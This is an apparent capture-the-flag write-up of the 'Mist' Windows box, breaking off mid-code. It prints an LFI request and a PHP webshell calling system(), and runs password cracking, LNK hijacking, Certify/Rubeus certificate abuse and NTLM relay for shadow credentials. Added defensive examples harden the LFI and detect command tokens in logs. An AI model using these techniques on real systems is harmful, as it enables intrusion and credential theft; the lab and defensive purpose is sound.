Machine Card listing Mist as an insane Windows box

Reconnaissance

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-generator: pluck 4.7.18
| http-title: Mist - Mist
|_Requested resource was http://10.129.231.20/?file=mist
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/

The nmap scan already identified the application running on port 80 as Pluck CMS version 4.7.18 and that there are two entries in the robots.txt file.

HTTP

Webpage of Mist showing a quote by Henry David Thoreau

The webpage shows only a quote by Henry David Thoreau and a link to /login.php, which asks for nothing but a password; none of the default ones is accepted.

From the robots.txt I know that /data/ probably exists, but it just redirects to the default page, and even though /docs/ has directory listing enabled, it only contains irrelevant information.

Initial Access

Version 4.7.18 is pretty dated (over a year old at the time of writing) but it’s also the latest version [1]. Searching for known exploits for this exact version only finds references to an authenticated remote code execution through the upload of a malicious plugin. Another result for the minor version 4.7 is a directory traversal within the albums_getimage.php code. Unfortunately the provided PoC does not work and just returns "A hacking attempt has been detected".

Since Pluck is available on Github, I can have a look at the source code there and check what exactly is preventing the exploitation. The latest commit includes a check for several special characters and if I were to bypass the filter, it would try to load the file from ../../settings/modules/albums/.

<?php
/*
 * This file is part of pluck, the easy content management system
 * Copyright (c) pluck team
 * http://www.pluck-cms.org
 
 * Pluck is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 
 * See docs/COPYING for the complete license.
*/
//Run security
foreach ($_GET as $get_value) {
	if (is_array($get_value) || preg_match('/\.\.|[\\\\:<>&="?*]/', $get_value))
		die ('A hacking attempt has been detected. For security reasons, we\'re blocking any code execution.');
}
unset($get_value);
 
//Define variable
$image = $_GET['image'];
 
//Then, check for hacking attempts (Remote Code Execution), and block them.
if (strpos($image, 'thumb') === false) {
	if (preg_match('#([.*])([/])([A-Za-z0-9.]{0,11})#', $image, $matches)) {
		if ($image != $matches[0]) {
			unset($image);
			die('A hacking attempt has been detected. For security reasons, we\'re blocking any code execution.');
		}
	}
}
 
elseif (strpos($image, 'thumb') !== false) {
	if (preg_match('#([.*])([/])thumb([/])([A-Za-z0-9.]{0,11})#', $image, $matches)) {
		if ($image != $matches[0]) {
			unset($image);
			die('A hacking attempt has been detected. For security reasons, we\'re blocking any code execution.');
		}
	}
}
 
//...if no hacking attempts found:
//Check if file exists.
if (file_exists('../../settings/modules/albums/'.$image)) {
	//Generate the image, make sure it doesn't end up in the visitors buffer.
	header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
	header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
	header('Pragma: no-cache');
	header('Content-Type: image/jpeg');
	echo readfile('../../settings/modules/albums/'.$image);
}
 
//If image doesn't exist, send 404 header.
else
	header('HTTP/1.0 404 Not Found');
?>

The PoC located the albums_getimage.php file in /data/modules/albums, so the images are loaded from /data/settings/modules/albums/ on the webserver. As already seen with other folders, directory listing is enabled there as well, and one file stands out: admin_backup.php.

Screenshot of the directory listing in albums showing a file admin_backup.php

Directly accessing the file does not work because the server interprets the PHP code, but using the previously found LFI lets me download the contents.

curl "http://10.129.231.20/data/modules/albums/albums_getimage.php?image=admin_backup.php"
<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146
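The check in albums_getimage.php is purely a denylist of characters, and the final readfile() has no allowlist of what may be served. The following Python model is an added example, not Pluck's own code: it reproduces that logic (note that "[.*]" in the shape regex is a character class matching a literal dot or star, not "anything") beside a hardened variant that accepts only a bare file name with an image extension and confines the resolved path to the albums directory. The directory contents are constructed in a temporary folder, and the hash inside the fake admin_backup.php is a placeholder.

```python
import os
import re
import tempfile
from typing import Dict, Optional, Tuple

# Character denylist from the "Run security" loop in albums_getimage.php:
# "..", backslash, colon, angle brackets, ampersand, equals, double quote, ? and *.
DENYLIST = re.compile(r'\.\.|[\\:<>&="?*]')

# The two shape checks that follow in the original. "[.*]" is a character class
# (a literal dot or star), so these only fire for values such as "./x" or "*/thumb/x".
SHAPE_PLAIN = re.compile(r'([.*])([/])([A-Za-z0-9.]{0,11})')
SHAPE_THUMB = re.compile(r'([.*])([/])thumb([/])([A-Za-z0-9.]{0,11})')

ALLOWED_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif"}


def pluck_style_getimage(albums_dir: str, image: str) -> Optional[bytes]:
    """Model of the original flow: denylist, shape check, file_exists(), readfile()."""
    if DENYLIST.search(image):
        raise PermissionError("A hacking attempt has been detected.")
    shape = SHAPE_THUMB if "thumb" in image else SHAPE_PLAIN
    match = shape.search(image)
    if match and image != match.group(0):
        raise PermissionError("A hacking attempt has been detected.")
    # No allowlist on the file type: any readable file in the directory is returned
    # as image/jpeg, which is how the PHP source of admin_backup.php leaks.
    path = os.path.join(albums_dir, image)
    if not os.path.isfile(path):
        return None  # the original answers with a 404 here
    with open(path, "rb") as fh:
        return fh.read()


def hardened_getimage(albums_dir: str, image: str) -> Optional[bytes]:
    """Hardened form: allowlist the name and type, then confine the resolved path."""
    # 1. Only a bare file name is accepted; anything with a directory part is rejected.
    if not image or image != os.path.basename(image) or image in (".", ".."):
        raise PermissionError("invalid image name")
    # 2. Only the image types the module is meant to serve.
    if os.path.splitext(image)[1].lower() not in ALLOWED_SUFFIXES:
        raise PermissionError("not an image")
    # 3. Resolve symlinks and confirm the result still lies inside the albums directory.
    base = os.path.realpath(albums_dir)
    path = os.path.realpath(os.path.join(base, image))
    if os.path.commonpath([base, path]) != base:
        raise PermissionError("path escapes albums directory")
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return fh.read()


def demo() -> Dict[Tuple[str, str], str]:
    """Run both handlers against a constructed albums directory holding one real
    image and a stray PHP backup; returns served / 404 / blocked per request."""
    results: Dict[Tuple[str, str], str] = {}
    with tempfile.TemporaryDirectory() as albums_dir:
        with open(os.path.join(albums_dir, "cat.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff\xe0 constructed JPEG bytes")
        with open(os.path.join(albums_dir, "admin_backup.php"), "wb") as fh:
            fh.write(b"<?php\n$ww = 'HASH-PLACEHOLDER';\n?>")  # constructed, not the real hash
        for label, handler in (("pluck", pluck_style_getimage), ("hardened", hardened_getimage)):
            for image in ("cat.jpg", "admin_backup.php", "../settings.php", "missing.jpg"):
                try:
                    body = handler(albums_dir, image)
                    results[(label, image)] = "served" if body is not None else "404"
                except PermissionError:
                    results[(label, image)] = "blocked"
    return results


if __name__ == "__main__":
    for key, outcome in demo().items():
        print(f"{key[0]:9s} {key[1]:18s} -> {outcome}")
```

The model serves admin_backup.php exactly as the live site did, while the hardened handler rejects it for its extension before any filesystem access; the realpath containment check is what would also stop a symlink dropped into the albums folder.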

This does look like a backup of the hash that is used to login. The source code identifies the hash as SHA512 and john finds the cleartext password lexypoo97 after a few seconds.

john --format=Raw-SHA512 --fork=10 --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Node numbers 1-10 of 10 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
lexypoo97        (?)
--- SNIP ---

Trying the password does work for the login and I’m able to access the admin dashboard of Pluck.

Screenshot of the Admin dashboard in Pluck

Execution

After getting access to the admin area, I can proceed to use the previously found RCE to get a reverse shell on the target. The script on exploit-db wants the path to a ZIP file to upload, but does not really explain how that should be created. The official example on how to create plugins is not a big help either. Eventually one can find the Github repository of the exploit author, which contains a sample ZIP.

Basically the ZIP file contains just a single PHP file with the code, and I can upload my plugin by going to Options > Manage modules > Install a module….

Screenshots with the steps to install a new module highlighted

First I create a simple PHP script that takes everything from the parameter ryuki and passes it to system.

ryuki.php
<?php
 
if(isset($_REQUEST['ryuki'])){
        $cmd = ($_REQUEST['ryuki']);
        system($cmd);
        die;
}
 
?>

Next I’ll compress that file to ryuki.zip before uploading it as a new module. The message after the upload indicates success and I should be able to access the script at /data/modules/<ZIP NAME>/<FILENAME>. Supplying whoami as parameter ryuki returns the current user: svc_web.

curl 'http://10.129.231.20/data/modules/ryuki/ryuki.php?ryuki=whoami'
ms01\svc_web

I use the simple webshell to upload a Sliver payload and use that to get a reverse shell. The uploaded modules get deleted at a set interval, so I place the PHP script and the Sliver binary into C:\xampp\htdocs to achieve persistence.
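Both steps so far leave distinctive traces in the Apache access log: albums_getimage.php answering requests whose image parameter is not an image, and a freshly installed module file receiving command-like parameters. The following Python example (added here, not part of the write-up) runs two such rules over constructed combined-format log lines modelled on the requests above; the client address is a documentation-range placeholder and the token list is deliberately short.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines modelled on the requests in this write-up.
# The client address is from a documentation range, not a real host.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Oct/2024:13:20:01 +0000] "GET /data/modules/albums/albums_getimage.php?image=cat.jpg HTTP/1.1" 200 951
203.0.113.7 - - [09/Oct/2024:13:21:44 +0000] "GET /data/modules/albums/albums_getimage.php?image=admin_backup.php HTTP/1.1" 200 146
203.0.113.7 - - [09/Oct/2024:13:30:12 +0000] "GET /data/modules/ryuki/ryuki.php?ryuki=whoami HTTP/1.1" 200 14
203.0.113.7 - - [09/Oct/2024:13:31:05 +0000] "GET /?file=mist HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
IMAGE_SUFFIXES = (".jpg", ".jpeg", ".png", ".gif")
# Words that have no business in a Pluck query parameter; deliberately a short list.
COMMAND_TOKENS = ("whoami", "cmd.exe", "cmd /c", "powershell", "certutil", "net user")


def analyse(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious request; each names the rule that fired."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these
        parts = urlsplit(m["target"])
        params = parse_qs(parts.query, keep_blank_values=True)

        # Rule 1: albums_getimage.php asked for something that is not an image file.
        if parts.path.endswith("/albums_getimage.php"):
            for value in params.get("image", []):
                if not value.lower().endswith(IMAGE_SUFFIXES):
                    findings.append({"rule": "non-image-via-getimage", "ip": m["ip"],
                                     "ts": m["ts"], "detail": value})

        # Rule 2: a query parameter carries a command-like token (parse_qs already
        # URL-decodes the value, so percent-encoded forms are caught as well).
        for key, values in params.items():
            for value in values:
                lowered = value.lower()
                if any(tok in lowered for tok in COMMAND_TOKENS):
                    findings.append({"rule": "command-like-parameter", "ip": m["ip"],
                                     "ts": m["ts"], "detail": f"{parts.path}?{key}={value}"})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']}  {f['rule']:24s}  {f['detail']}")
```

Rule 1 is the more reliable of the two because it needs no knowledge of the attacker's parameter names; rule 2 is a cheap first filter and would be complemented in practice by alerting on new .php files appearing under /data/modules/ or in the htdocs root.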

Privilege Escalation

Looking around on the host MS01 I can see that it corresponds to the IP 192.168.100.101, so there’s at least one other system in play - the Domain Controller DC01 for the mist.htb domain at 192.168.100.100.

Shell as brandon.keywarp

Besides the svc_web user there are two other users configured on the system: Brandon.Keywarp and Sharon.Mullard. After some basic enumeration I find the directory Common Applications right in the root of the C: drive. As the name suggests, it houses three LNK files pointing to common applications, and all members of BUILTIN\Users have write access to it.

icacls "C:\Common Applications"
C:\Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                       MS01\Administrator:(OI)(CI)(F)
                       BUILTIN\Administrators:(OI)(CI)(F)
                       BUILTIN\Users:(OI)(CI)(RX,W)
 
Successfully processed 1 files; Failed processing 0 files

I decide to replace one of those LNK files with my own, calling the sliver payload. A few minutes pass and there’s a new session as brandon.keywarp.

$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\Common Applications\Notepad.lnk")
$Shortcut.TargetPath = "C:\xampp\htdocs\m.exe"
$Shortcut.Save()
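The condition that makes this possible is simply an inheritable write ACE for a low-privileged group on a directory full of launchable shortcuts. The following Python example, added here and not from the write-up, parses icacls output (the listing above, re-typed as a constructed string) and reports such ACEs; the queried path is passed in because icacls prints it in front of the first ACE and both the path and the principal names may contain spaces.

```python
import re
from dataclasses import dataclass
from typing import List, Set

# The icacls listing from this write-up, re-typed as a constructed string.
SAMPLE_ICACLS = """\
C:\\Common Applications NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                       MS01\\Administrator:(OI)(CI)(F)
                       BUILTIN\\Administrators:(OI)(CI)(F)
                       BUILTIN\\Users:(OI)(CI)(RX,W)

Successfully processed 1 files; Failed processing 0 files
"""

ACE_RE = re.compile(r"^(?P<principal>[^()]+?):(?P<flags>(?:\([^)]*\))+)$")
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple rights plus the specific rights that allow creating or changing content.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}
LOW_PRIV = {"builtin\\users", "everyone", "nt authority\\authenticated users",
            "nt authority\\interactive"}


@dataclass
class Ace:
    principal: str
    inherit: Set[str]
    rights: Set[str]


def parse_icacls(path: str, output: str) -> List[Ace]:
    """Parse the output of `icacls <path>` into ACEs."""
    aces: List[Ace] = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first line carries the queried path
        m = ACE_RE.match(line)
        if not m:
            continue
        inherit: Set[str] = set()
        rights: Set[str] = set()
        for group in re.findall(r"\(([^)]*)\)", m["flags"]):
            for token in group.split(","):
                (inherit if token in INHERIT_FLAGS else rights).add(token)
        aces.append(Ace(m["principal"].strip(), inherit, rights))
    return aces


def risky_write_aces(path: str, output: str) -> List[Ace]:
    """ACEs that let a low-privileged principal write into the directory and,
    via (OI)/(CI), into the files and folders beneath it."""
    return [
        ace for ace in parse_icacls(path, output)
        if ace.principal.lower() in LOW_PRIV
        and ace.rights & WRITE_RIGHTS
        and ace.inherit & {"OI", "CI"}
    ]


if __name__ == "__main__":
    for ace in risky_write_aces("C:\\Common Applications", SAMPLE_ICACLS):
        print(f"{ace.principal}: rights={sorted(ace.rights)} inherit={sorted(ace.inherit)}")
```

Run over a list of directories that other users are expected to launch content from (shared shortcut folders, Public desktop, application install roots), this check surfaces the same (RX,W) grant to BUILTIN\Users that the write-up found by hand.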

Shell as Administrator (MS01$)

In order to escalate my privileges on MS01$, I plan to coerce an authentication to my host via WebDAV and relay it to the Domain Controller to set up Shadow Credentials on the MS01$ machine account.
This requires me to do three things:

  • Open a route towards the Domain Controller at 192.168.100.100 and open a local port to forward the authentication back to my host
  • Obtain credentials for an account to run PetitPotam from my host
  • Enable the WebDAV client on MS01$

With the chisel extension in sliver I open a SOCKS proxy and forward the local port 8080 on the target to my host on port 9999. This solves the first problem.

Through certify I’ll check the available certificate templates first and find the User template, in which Brandon.Keywarp is able to enroll. Requesting a new certificate returns the private key and the certificate as well as instructions to convert them to pfx.

sliver (mist) > certify find
 
[*] certify output:
 
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0
 
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'
 
[*] Listing info about the Enterprise CA 'mist-DC01-CA'
 
    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544
 
      Access Rights                                     Principal
 
      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None
 
[*] Available Certificates Templates :
 
    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Users             S-1-5-21-1045809509-3006658589-2426055941-513
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
--- SNIP ---
 
sliver (mist) > certify request /ca:DC01.mist.htb\\mist-DC01-CA /template:User
 
[*] certify output:
 
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0
 
[*] Action: Request a Certificates
 
[*] Current user context    : MIST\Brandon.Keywarp
[*] No subject name specified, using current context as subject.
 
[*] Template                : User
[*] Subject                 : CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
 
[*] Certificate Authority   : DC01.mist.htb\mist-DC01-CA
 
[*] CA Response             : The certificate had been issued.
[*] Request ID              : 60
 
[*] cert.pem         :
 
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[certificate omitted]
-----END CERTIFICATE-----
 
 
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 
 
 
Certify completed in 00:00:14.4091341

I’ll convert the base64 certificate to pfx (without providing a password) and upload the file to C:\temp\cert.pfx, to be used with Rubeus to retrieve a new TGT via PKINIT and, through U2U, the NTLM hash of the user. The command returns DB03D6A77A2205BC1D07082740626CC9 and resolves the second problem.

sliver (mist) > upload cert.pfx
 
[*] Wrote file to C:\temp\cert.pfx
 
sliver (mist) > rubeus asktgt /getcredentials /nowrap /show /domain:mist.htb /dc:DC01.mist.htb /user:brandon.keywarp /certificate:C:\\temp\\cert.pfx
 
[*] rubeus output:
 
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.3.2
 
[*] Action: Ask TGT
 
[*] Using PKINIT with etype rc4_hmac and subject: CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mist.htb\brandon.keywarp'
[*] Using domain controller: 192.168.100.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
 
      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
 
  ServiceName              :  krbtgt/mist.htb
  ServiceRealm             :  MIST.HTB
  UserName                 :  brandon.keywarp (NT_PRINCIPAL)
  UserRealm                :  MIST.HTB
  StartTime                :  10/9/2024 6:31:01 AM
  EndTime                  :  10/9/2024 4:31:01 PM
  RenewTill                :  10/16/2024 6:31:01 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  V4AN6zyZweYh+XAdWwA/jw==
  ASREP (key)              :  E398D3840C555B6DC57DFDDDC32D07FF
 
[*] Getting credentials using U2U
 
  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : DB03D6A77A2205BC1D07082740626CC9

Now I just need to enable WebDAV on the server. There are several methods to accomplish that, either by mapping a network share or using a searchConnector-ms file (this requires someone to view the folder) [2].

Hint

It’s also possible to use c2tc-startwebclient from the sliver armory

Trying to start the service via sc.exe fails due to missing permissions, but this service also has a custom ETW trigger defined and can therefore be started through that [3]. There’s also a PoC that uses C# embedded in a PowerShell script to fire the trigger via its GUID 22b6d684-fa63-4578-87c9-effcbe6643c7 (found with sc.exe qtriggerinfo WebClient).

Enable-WebDavClient.ps1
$Source = @"
using System;
using System.Text;
using System.Security;
using System.Collections.Generic;
using System.Runtime.Versioning;
using Microsoft.Win32.SafeHandles;
using System.Runtime.InteropServices;
using System.Diagnostics.CodeAnalysis;
namespace JosL.WebClient{
public static class Starter{
[StructLayout(LayoutKind.Explicit, Size=16)]
public class EVENT_DESCRIPTOR{
[FieldOffset(0)]ushort Id = 1;
[FieldOffset(2)]byte Version = 0;
[FieldOffset(3)]byte Channel = 0;
[FieldOffset(4)]byte Level = 4;
[FieldOffset(5)]byte Opcode = 0;
[FieldOffset(6)]ushort Task = 0;
[FieldOffset(8)]long Keyword = 0;
}
 
[StructLayout(LayoutKind.Explicit, Size = 16)]
public struct EventData{
[FieldOffset(0)]
internal UInt64 DataPointer;
[FieldOffset(8)]
internal uint Size;
[FieldOffset(12)]
internal int Reserved;
}
 
public static void startService(){
Guid webClientTrigger = new Guid(0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7);
 
long handle = 0;
uint output = EventRegister(ref webClientTrigger, IntPtr.Zero, IntPtr.Zero, ref handle);
 
bool success = false;
 
if (output == 0){
EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR();
unsafe
{
uint writeOutput = EventWrite(handle, ref desc, 0, null);
success = writeOutput == 0;
EventUnregister(handle);
}
}
}
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventRegister(ref Guid guid, [Optional] IntPtr EnableCallback, [Optional] IntPtr CallbackContext, [In][Out] ref long RegHandle);
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern unsafe uint EventWrite(long RegHandle, ref EVENT_DESCRIPTOR EventDescriptor, uint UserDataCount, EventData* UserData);
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventUnregister(long RegHandle);
}
}
"@
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$compilerParameters.CompilerOptions="/unsafe"
Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $compilerParameters
[JosL.WebClient.Starter]::startService()

After running the PowerShell script the WebDAV client is up and running (for a few minutes), so before doing this I’ll set up ntlmrelayx from impacket on my machine to catch the authentication and relay it through the SOCKS proxy to the Domain Controller.

Info

The current version from impacket (0.12.0) does not allow the removal of the shadow credentials but there is a pull request that adds this feature. This is necessary because there are already shadow credentials set for MS01$ as seen with pywhisker.

proxychains -q \
            python3 pywhisker.py \
            --user brandon.keywarp \
            --hashes :DB03D6A77A2205BC1D07082740626CC9 \
            --domain mist \
            --target 'MS01$' \
            --action "list" \
            --dc-ip 192.168.100.100
[*] Searching for the target account
[*] Target user found: CN=MS01,CN=Computers,DC=mist,DC=htb
[*] Listing devices for MS01$
[*] DeviceID: 8cd97a3f-1874-4050-8154-cacac1a12514 | Creation Time (UTC): 2024-10-09 14:01:02.550468
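To make the listing above reproducible on the defending side, here is an added Python example (not pywhisker's and not the write-up's code) that parses msDS-KeyCredentialLink values as LDAP returns them, DN-Binary strings wrapping a KEYCREDENTIALLINK_BLOB laid out as in MS-ADTS, extracts the DeviceID and creation time of each key credential, and diffs the result against a per-account baseline so that an unexpected new entry on an account such as MS01$ stands out. The sample values are constructed inline from the DeviceID and timestamp shown above plus a second, obviously fake DeviceID; the key material is placeholder bytes.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Set, Tuple

# Entry identifiers from the KEYCREDENTIALLINK_BLOB layout (MS-ADTS).
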